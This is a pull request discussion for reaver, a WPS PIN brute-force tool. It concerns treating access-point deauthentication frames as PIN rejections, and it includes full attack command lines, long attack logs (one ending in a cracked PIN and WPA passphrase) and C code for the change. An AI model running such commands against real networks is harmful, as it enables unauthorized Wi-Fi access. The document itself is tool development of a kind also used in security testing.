Treat the timeout as NACK if receive deauth request while waiting for M5/M7 #372

Open. Wants to merge 1 commit into base: master.

Conversation

@feitoi (Contributor) commented May 10, 2023

I've already analyzed several situations with deauth requests; they appear after Sending identity response, Sending M2 message, Sending M4 message and Sending M6 message, and sometimes a WSC NACK is also received after the deauth request. Later I tested with routers whose PIN was already cracked and noticed that some routers are sending a deauth request instead of a WSC NACK. With this knowledge I think it is possible to treat a deauth request after Sending M4 message or Sending M6 message followed by a timeout as a WSC NACK, with a new option -D to treat deauth requests as WSC NACK.

See an example with a modified reaver that counts messages, with the PIN not cracked yet:

BSSID               Ch  dBm  WPS  Lck  Vendor    Progr  ESSID
--------------------------------------------------------------------------------
B8:5E:71:XX:XX:XX    1  -76  2.0  No   Broadcom   0.04  TestAP

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0mon to channel 1
[+] Restored previous session
[+] Waiting for beacon from B8:5E:71:XX:XX:XX
[+] Received beacon from B8:5E:71:XX:XX:XX
[+] Vendor: Broadcom
[+] Trying DEFAULT PIN "62327145"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received identity request (5)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (6)
[+] Sending identity response
[+] Received identity request (7)
[+] Sending identity response
[+] Received identity request (8)
[+] Sending identity response
[+] Received identity request (9)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (10)
[+] Sending identity response
[+] Received identity request (11)
[+] Sending identity response
[+] Received identity request (12)
[+] Sending identity response
[+] Received identity request (13)
[+] Sending identity response
[+] Received identity request (14)
[+] Sending identity response
[+] Received identity request (15)
[+] Sending identity response
[+] Received identity request (16)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (17)
[+] Sending identity response
[+] Received identity request (18)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=1
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying DEFAULT PIN "62327145"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (5)
[+] Sending identity response
[+] Received identity request (6)
[+] Sending identity response
[+] Received identity request (7)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (8)
[+] Sending identity response
[+] Received identity request (9)
[+] Sending identity response
[+] Received identity request (10)
[+] Sending identity response
[+] Received identity request (11)
[+] Sending identity response
[+] Received identity request (12)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (13)
[+] Sending identity response
[+] Received identity request (14)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (15)
[+] Sending identity response
[+] Received identity request (16)
[+] Sending identity response
[+] Received identity request (17)
[+] Sending identity response
[+] Received identity request (18)
[+] Sending identity response
[+] Received identity request (19)
[+] Sending identity response
[+] Received identity request (20)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received deauth request
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received deauth request
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received M3 message (3)
[+] Received M3 message (4)
[+] Received M3 message (5)
[+] Received M3 message (6)
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=48
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying DEFAULT PIN "62327145"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=1
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying DEFAULT PIN "62327145"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (4)
[+] Sending identity response
[+] Received identity request (5)
[+] Sending identity response
[+] Received identity request (6)
[+] Sending identity response
[+] Received identity request (7)
[+] Sending identity response
[+] Received identity request (8)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (9)
[+] Sending identity response
[+] Received identity request (10)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (11)
[+] Sending identity response
[+] Received identity request (12)
[+] Sending identity response
[+] Received identity request (13)
[+] Sending identity response
[+] Received identity request (14)
[+] Sending identity response
[+] Received identity request (15)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (16)
[+] Sending identity response
[+] Received identity request (17)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (18)
[+] Sending identity response
[+] Received identity request (19)
[+] Sending identity response
[+] Received identity request (20)
[+] Sending identity response
[+] Received identity request (21)
[+] Sending identity response
[+] Received identity request (22)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received deauth request
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received M1 message (19)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received deauth request
[+] Received WSC NACK (reason: 0x0012) (deauth_flag=6)
[+] Sending WSC NACK
[+] Trying DEFAULT PIN "10864111"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
......

Example with half PIN:

root@kali:~# reaver -i wlan0mon -b 8C:44:4F:XX:XX:XX -c 1 -vv -N -p 7429 -t 35

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0mon to channel 1
[?] Restore previous session for 8C:44:4F:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from 8C:44:4F:XX:XX:XX
[+] Received beacon from 8C:44:4F:XX:XX:XX
[+] Vendor: Broadcom
[+] Trying pin "74295678"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 8C:44:4F:XX:XX:XX (ESSID: TestAP 2.4 G)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received identity request (5)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received M1 message (19)
[+] Received M1 message (20)
[+] Received M1 message (21)
[+] Received M1 message (22)
[+] Received M1 message (23)
[+] Received M1 message (24)
[+] Received M1 message (25)
[+] Received M1 message (26)
[+] Received M1 message (27)
[+] Received M1 message (28)
[+] Received M1 message (29)
[+] Received M1 message (30)
[+] Received M1 message (31)
[+] Received M1 message (32)
[+] Received M1 message (33)
[+] Received M1 message (34)
[+] Received M1 message (35)
[+] Received M1 message (36)
[+] Received M1 message (37)
[+] Received M1 message (38)
[+] Received M1 message (39)
[+] Received M1 message (40)
[+] Received M1 message (41)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received M3 message (3)
[+] Received M3 message (4)
[+] Received M3 message (5)
[+] Received M5 message (0)
[+] Sending M6 message
[+] Received M5 message (1)
[+] Received M5 message (2)
[+] Received M5 message (3)
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=111
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "74295678"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 8C:44:4F:XX:XX:XX (ESSID: TestAP 2.4 G)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received M1 message (19)
[+] Received M1 message (20)
[+] Received M1 message (21)
[+] Received M1 message (22)
[+] Received M1 message (23)
[+] Received M1 message (24)
[+] Received M1 message (25)
[+] Received M1 message (26)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received M3 message (3)
[+] Received M3 message (4)
[+] Received M3 message (5)
[+] Received M5 message (0)
[+] Sending M6 message
[+] Received M5 message (1)
[+] Received M5 message (2)
[+] Received M5 message (3)
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=106
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
^C
[+] Session saved.

Example with full PIN:

root@kali:~# reaver -i wlan0mon -b 8C:44:4F:XX:XX:XX -c 1 -vv -N -p 7429548 -t 35

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0mon to channel 1
[?] Restore previous session for 8C:44:4F:XX:XX:XX? [n/Y]
[+] Restored previous session
[+] Waiting for beacon from 8C:44:4F:XX:XX:XX
[+] Received beacon from 8C:44:4F:XX:XX:XX
[+] Vendor: Broadcom
[+] Trying pin "74295487"
[+] Sending authentication request
[+] Sending association request
[!] WARNING: Receive timeout occurred
[+] Sending authentication request
[+] Sending association request
[+] Associated with 8C:44:4F:XX:XX:XX (ESSID: TestAP 2.4 G)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received M1 message (19)
[+] Received M1 message (20)
[+] Received M1 message (21)
[+] Received M1 message (22)
[+] Received M1 message (23)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received M3 message (3)
[+] Received M3 message (4)
[+] Received M5 message (0)
[+] Sending M6 message
[+] Received M5 message (1)
[+] Received M5 message (2)
[+] Received M5 message (3)
[+] Received M5 message (4)
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 55 seconds
[+] WPS PIN: '74295487'
[+] WPA PSK: 'password'
[+] AP SSID: 'TestAP 2.4 G'

See an example without a PIN:

root@kali:~# reaver -i wlan2mon -b 8C:44:4F:XX:XX:XX -c 1 -vv -N -t 35

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan2mon to channel 1
[?] Restore previous session for 8C:44:4F:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from 8C:44:4F:XX:XX:XX
[+] Received beacon from 8C:44:4F:XX:XX:XX
[+] Vendor: Broadcom
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 8C:44:4F:XX:XX:XX (ESSID: TestAP 2.4 G)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=205
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^C
[+] Nothing done, nothing to save.

* Treat the timeout as NACK if receive deauth request while waiting for M5/M7.
*/
else if (deauth_flag && (last_msg == M3 || last_msg == M5) && get_deauth_is_nack()) {
ret_val = KEY_REJECTED;
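Review bot: `deauth_flag` is tested here as a boolean (`deauth_flag && ...`), but the logs in the description print it as a running count (`deauth_flag=48`, `deauth_flag=111`, `deauth_flag=205`), so the name and the comment above do not say what is actually being checked: any nonzero number of deauths during this attempt, not a single event. Either rename it to `deauth_count` or state in the comment that one deauth is enough to take the KEY_REJECTED path, and note there that a correct pin can be skipped when the AP deauths while we wait for M5/M7, since that is the trade-off this branch makes.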
Collaborator:

If we set this to REJECTED, wouldn't it mean that even though the PIN could be correct when the router sends a deauth, the next PIN will be tried?

feitoi (Contributor Author):

Analyzing the first example, this can happen, so the -D option is optional. We can override the -D option if we receive a WSC NACK, like the -J option.

/* in exchange.c */
	if(got_nack)
	{
		/*
		 * If a NACK message was received, then the current wps->state value will be
		 * SEND_WSC_NACK, indicating that we need to reply with a NACK. So check the
		 * previous state to see what state we were in when the NACK was received.
		 */
		if(last_msg == M3 || last_msg == M5)
		{
			/* The AP is properly sending WSC_NACKs, so don't treat future timeouts as pin failures. */
			set_timeout_is_nack(0);
			set_deauth_is_nack(0); /* override here */

			ret_val = KEY_REJECTED;

I still can't learn much about the behavior of these routers to give them better treatment, because I don't have access to them, they have WPS Lock, and I still don't know the first half of the PIN.

Collaborator:

Ah, sorry that I didn't mention it earlier, but my idea was not to introduce another command-line option, but to always Do The Right Thing, in which case this behaviour would need to be fine-tuned.

feitoi (Contributor Author):

With WPS 2.0, it can't determine whether or not the router sends a deauth request instead of a NACK in just a few attempts because of the WPS LOCK.
The solution I thought of would be to store the count of deauth requests received without a NACK in the .wpc file.
If after 10 counts, for example, no NACK has been received, then it can consider that the router sends deauth requests instead of NACKs.
The count starts at 0 and increments with each deauth request without a NACK; if a NACK is received, then store -1, which represents that the router sends NACKs, and ignore the deauth request treatment.

}
else
{
/* If we timed out at any other point in the session, then we need to try the pin again */
ret_val = RX_TIMEOUT;
}
/* Got timeout instead of an M5 message when cracking second half */
if (ret_val == KEY_REJECTED && !get_pin_string_mode() && last_msg == M3 && get_key_status() == KEY2_WIP) {
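Review bot: after the new branch, `ret_val == KEY_REJECTED` no longer implies the timeout-as-NACK case alone; a deauth-derived rejection with `last_msg == M3` and `get_key_status() == KEY2_WIP` now also enters this block, although its comment ("Got timeout instead of an M5 message when cracking second half") describes only the former. Either guard it with the same `get_deauth_is_nack()` distinction used above, or update the comment to say that the deauth case is intentionally handled the same way.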
Collaborator:

What about deauth after/before M1?

feitoi (Contributor Author):

Analyzing the first example, deauth can appear at many steps, so if it is received before M1, or after M1 and before M3, also leave it as it is, because after the timeout reaver will restart the attempt.

@feitoi force-pushed the PR-feitoi branch 2 times, most recently from 1c28ca1 to f1cf73a on July 18, 2023 06:00
Automatically treat the timeout as NACK if a deauth request is received while waiting
for M5/M7, when deauth_is_nack_count >= MAX_DEAUTH_IS_NACK_COUNT and a WSC_NACK
has never been received.
The count value is stored in the .wpc file; -1 means the AP sends NACK.
@feitoi (Contributor Author) commented Jul 18, 2023

After many observations: if a deauth request is received before M3, then end the WPS transaction by sending WSC_NACK and restart the attempt.
If a deauth request is received after M3/M5, then wait for the timeout and store the count value in the .wpc file.
If after 10 times no NACK has been received, then it can consider that the router sends deauth requests instead of NACKs.
If a NACK is received, then store -1, which represents that the router sends NACKs, and ignore the deauth request treatment.
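The rule the thread converges on (count deauth-then-timeout failures after M3/M5, treat them as a NACK once 10 have accumulated, and let a single real WSC NACK switch the heuristic off for good through the -1 sentinel), written out as an added C model of the state machine. This is not reaver's code: the function names, the counter handling and the assumed one-integer .wpc layout are illustrative assumptions, only the KEY_REJECTED/RX_TIMEOUT names and the threshold come from the thread.

```c
#include <stdio.h>

/* WPS Registration Protocol messages, numbered as reaver names them (subset). */
enum wps_msg { M1 = 1, M3 = 3, M5 = 5, M7 = 7 };

/* What a receive timeout is taken to mean (same names as reaver's exchange.c). */
enum timeout_result { RX_TIMEOUT = 0, KEY_REJECTED = 1 };

/* Counter persisted in the .wpc file (assumed layout: a single integer).
 *  >= 0 : deauths seen after M3/M5 without the AP ever sending a WSC NACK
 *  -1   : the AP does send real WSC NACKs, so deauths must not be read as NACKs */
#define MAX_DEAUTH_IS_NACK_COUNT 10
#define AP_SENDS_NACK (-1)

/* True once enough deauth-only failures accumulated and no NACK was ever seen. */
int deauth_is_nack(int count)
{
    return count != AP_SENDS_NACK && count >= MAX_DEAUTH_IS_NACK_COUNT;
}

/* A real WSC NACK arrived: this AP NACKs properly, so stop counting for good. */
void note_wsc_nack(int *count)
{
    *count = AP_SENDS_NACK;
}

/* Decide what a receive timeout means from the last message the AP sent before
 * going quiet and whether a deauth was seen while waiting. Updates *count. */
enum timeout_result classify_timeout(enum wps_msg last_msg, int deauth_seen, int *count)
{
    if (!deauth_seen)
        return RX_TIMEOUT;            /* ordinary timeout: the same pin is retried */
    if (last_msg != M3 && last_msg != M5)
        return RX_TIMEOUT;            /* deauth before M3: attempt restarts as before */
    if (*count != AP_SENDS_NACK)
        (*count)++;                   /* waiting for M5/M7 with no NACK so far: count it */
    return deauth_is_nack(*count) ? KEY_REJECTED : RX_TIMEOUT;
}

/* Scenario 1: an AP that only ever deauths. Returns the attempt number on which
 * deauth+timeout is first treated as a NACK (expected: MAX_DEAUTH_IS_NACK_COUNT). */
int attempts_until_treated_as_nack(void)
{
    int count = 0, attempt;
    for (attempt = 1; attempt <= 100; attempt++)
        if (classify_timeout(M3, 1, &count) == KEY_REJECTED)
            return attempt;
    return -1;
}

/* Scenario 2: an AP that sent one real NACK. Returns 1 when later deauth+timeouts
 * stay plain RX_TIMEOUTs and the -1 sentinel is never overwritten. */
int nack_disables_deauth_treatment(void)
{
    int count = 7, i;                 /* some deauths already counted, then ... */
    note_wsc_nack(&count);            /* ... a real WSC NACK is received */
    for (i = 0; i < 20; i++)
        if (classify_timeout(M5, 1, &count) != RX_TIMEOUT)
            return 0;
    return count == AP_SENDS_NACK;
}

/* Scenario 3: deauth before M3 is never counted, whatever the counter holds. */
int deauth_before_m3_not_counted(void)
{
    int count = 9;
    return classify_timeout(M1, 1, &count) == RX_TIMEOUT && count == 9;
}

int main(void)
{
    printf("deauth treated as NACK from attempt %d\n", attempts_until_treated_as_nack());
    printf("real NACK disables the heuristic: %d\n", nack_disables_deauth_treatment());
    printf("deauth before M3 left uncounted: %d\n", deauth_before_m3_not_counted());
    return 0;
}
```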
